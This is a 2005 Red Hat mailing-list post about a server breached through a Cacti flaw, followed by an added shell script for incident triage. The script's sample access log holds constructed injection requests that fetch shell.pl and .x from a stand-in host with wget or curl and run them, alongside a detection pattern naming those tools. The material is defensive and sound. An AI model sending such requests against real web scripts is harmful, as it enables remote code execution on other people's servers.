Eris Caffee <mailto:eris-redhat-list@xxxxxxxxxxx> on Saturday, August 20, 2005 12:04 PM said:

> For example, check to see if your /tmp directory is mounted with the
> noexec and nosuid options. Just enabling those options can prevent a
> lot of cracks since many attacks rely on being able to exploit a weak
> cgi script to upload a program into /tmp and run it.

Key #1.

> And, of course, cgi scripts are frequently a way for attackers to gain
> access to your system.

[snip]

> You can use the list to see if you had any versions of packages with
> known security holes, and you can use the logs, especially the web
> server logs, to see if there were any strange web requests around the
> time the crack occurred, such as someone running a cgi-script with lots
> of garbage characters on the request line.

Key #2.

Okay, so I looked into the /tmp directory and found ./shell.pl and ./.x. Upon further investigation I found http://linuxfr.org/~alis/ which details almost completely the same thing that happened to my server. It turns out a known vulnerability in Cacti (which takes advantage of a misconfigured /tmp directory, I presume) was used to gain access to the system. However, the difference between my server and the one detailed in the webpage is that I do not have anything in the /dev/shm directory, nor do I have a user called www-data. I'm "assuming" at this point that the assailant(s) did not get as far as the webpage describes.

According to my httpd log files it looks like the attack happened on Aug 16th. I didn't notice anything was wrong until Aug 19th when PuTTY started popping up a new DSA(?) SSH key for a server I'd been accessing for a very long time. It struck me as odd that even though I'm accessing the same server as usual, it would be creating a new key.

The author of the webpage suspects that his server was used to send spam since he did not find any large data files (e.g. warez). I'm not sure if my server was used for anything at all. However, it's entirely possible that the Cacti exploit was only used to get into the box and the perp didn't intend to send spam or warez at all. Instead they may have had other things in mind.

At this point I have not checked for a rootkit, though I plan to do that before I wipe the box. I also plan to segment the network so that even if the webserver is compromised the perp cannot sniff the rest of the network traffic and steal passwords/data. At least, that's how I think it would work.

Let me know your thoughts.

Thanks,
Chris.

-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
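The three checks this exchange turns on (Eris's advice to verify the noexec/nosuid mount on /tmp and to grep the web logs for CGI requests with garbage on the request line, and Chris's discovery of shell.pl and .x sitting in /tmp) as one added shell script. This is example code written for this page, not code from either poster, the list, or the linked write-up. Every mount line, directory, IP address and access-log line in it is constructed for illustration (RFC 5737 addresses), the function names tmp_mount_hardened, list_tmp_droppings and suspicious_cgi_requests are the example's own, and the two "malicious" log lines are made-up shapes of a CGI injection, not a reconstruction of the actual Cacti attack.

```shell
#!/bin/sh
# Added example, not code from the original message or its author.
# Three checks the thread suggests, each a function you can point at real
# data; here they run over constructed samples so the script works offline.
#   1. tmp_mount_hardened      is /tmp mounted noexec,nosuid?
#   2. list_tmp_droppings      which files in /tmp are executable or hidden?
#   3. suspicious_cgi_requests which httpd requests aim "garbage" at a script?
# All IPs, paths and log lines below are constructed (RFC 5737 addresses).

# ---- 1. mount options ------------------------------------------------------
# Constructed stand-in for the output of `cat /proc/mounts`.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0
/dev/sda2 /home ext3 rw 0 0'

# tmp_mount_hardened MOUNTS_TEXT MOUNTPOINT
# Echoes "hardened" when the mount carries both noexec and nosuid, "weak"
# when one or both are absent, and "missing" when there is no separate
# mount at all (then /tmp simply inherits the options of /).
tmp_mount_hardened() {
    line=$(printf '%s\n' "$1" | awk -v mp="$2" '$2 == mp { print; exit }')
    if [ -z "$line" ]; then echo missing; return 2; fi
    opts=",$(printf '%s\n' "$line" | awk '{ print $4 }'),"
    case "$opts" in
        *,noexec,*) case "$opts" in *,nosuid,*) echo hardened; return 0 ;; esac ;;
    esac
    echo weak; return 1
}

# ---- 2. contents of /tmp ---------------------------------------------------
# list_tmp_droppings DIR
# Lists regular files under DIR that are owner-executable or hidden (dot
# files such as the ".x" found in the thread). On a real box: list_tmp_droppings /tmp
list_tmp_droppings() {
    find "$1" -type f \( -perm -100 -o -name '.*' \) | sort
}

# Builds a scratch directory mirroring what Chris reported: an executable
# shell.pl, a hidden .x, and one harmless file that must not be listed.
make_sample_tmp() {
    d=$(mktemp -d)
    printf '#!/usr/bin/perl\n' > "$d/shell.pl" && chmod 700 "$d/shell.pl"
    : > "$d/.x"
    : > "$d/notes.txt"
    echo "$d"
}

# ---- 3. httpd access-log triage --------------------------------------------
# Constructed Apache-style log lines: three benign, two carrying the
# "cgi-script with lots of garbage on the request line" signature (shell
# metacharacters raw or %-encoded, a download tool, /tmp as the drop dir).
SAMPLE_LOG='192.0.2.10 - - [16/Aug/2005:03:12:44 -0500] "GET /index.html HTTP/1.1" 200 1342
192.0.2.10 - - [16/Aug/2005:03:12:45 -0500] "GET /cgi-bin/counter.cgi?page=home HTTP/1.1" 200 88
192.0.2.11 - - [16/Aug/2005:03:15:02 -0500] "GET /docs/tmp/readme.html HTTP/1.1" 200 512
198.51.100.7 - - [16/Aug/2005:03:40:01 -0500] "GET /cgi-bin/search.pl?q=%3Bwget%20http%3A%2F%2F198.51.100.9%2Fshell.pl%20-O%20%2Ftmp%2Fshell.pl%3Bperl%20%2Ftmp%2Fshell.pl HTTP/1.1" 200 412
198.51.100.7 - - [16/Aug/2005:03:41:17 -0500] "GET /cgi-bin/shop.cgi?id=1;cd%20/tmp;curl%20-O%20http://198.51.100.9/.x HTTP/1.0" 200 7'

# suspicious_cgi_requests LOG_TEXT
# Stage 1 keeps only requests whose path targets a script (.pl/.cgi/.php);
# stage 2 keeps those carrying injection hallmarks. Two stages so that a
# plain HTML page that merely has "tmp" in its path (line 3) is not flagged.
suspicious_cgi_requests() {
    printf '%s\n' "$1" \
      | grep -E '"(GET|POST|HEAD) [^" ]*\.(pl|cgi|php)' \
      | grep -Ei '(%7c|%3b|%26|\||;|wget|curl|/tmp|%2ftmp|/dev/shm|%2fdev%2fshm|\.\./|%2e%2e)'
}

# ---- demo on the constructed data ------------------------------------------
echo "/tmp mount:  $(tmp_mount_hardened "$SAMPLE_MOUNTS" /tmp)"
echo "/home mount: $(tmp_mount_hardened "$SAMPLE_MOUNTS" /home)"
d=$(make_sample_tmp)
echo "droppings in $d:"; list_tmp_droppings "$d"
rm -rf "$d"
echo "suspicious requests (client, time, path):"
suspicious_cgi_requests "$SAMPLE_LOG" | cut -d' ' -f1,4,7
```

On a real box, feed tmp_mount_hardened the contents of /proc/mounts (or the output of mount), point list_tmp_droppings at /tmp and /dev/shm, and pipe the httpd access log into suspicious_cgi_requests; the hallmark list in stage 2 is deliberately loose, so expect to eyeball the hits rather than treat each one as proof of compromise.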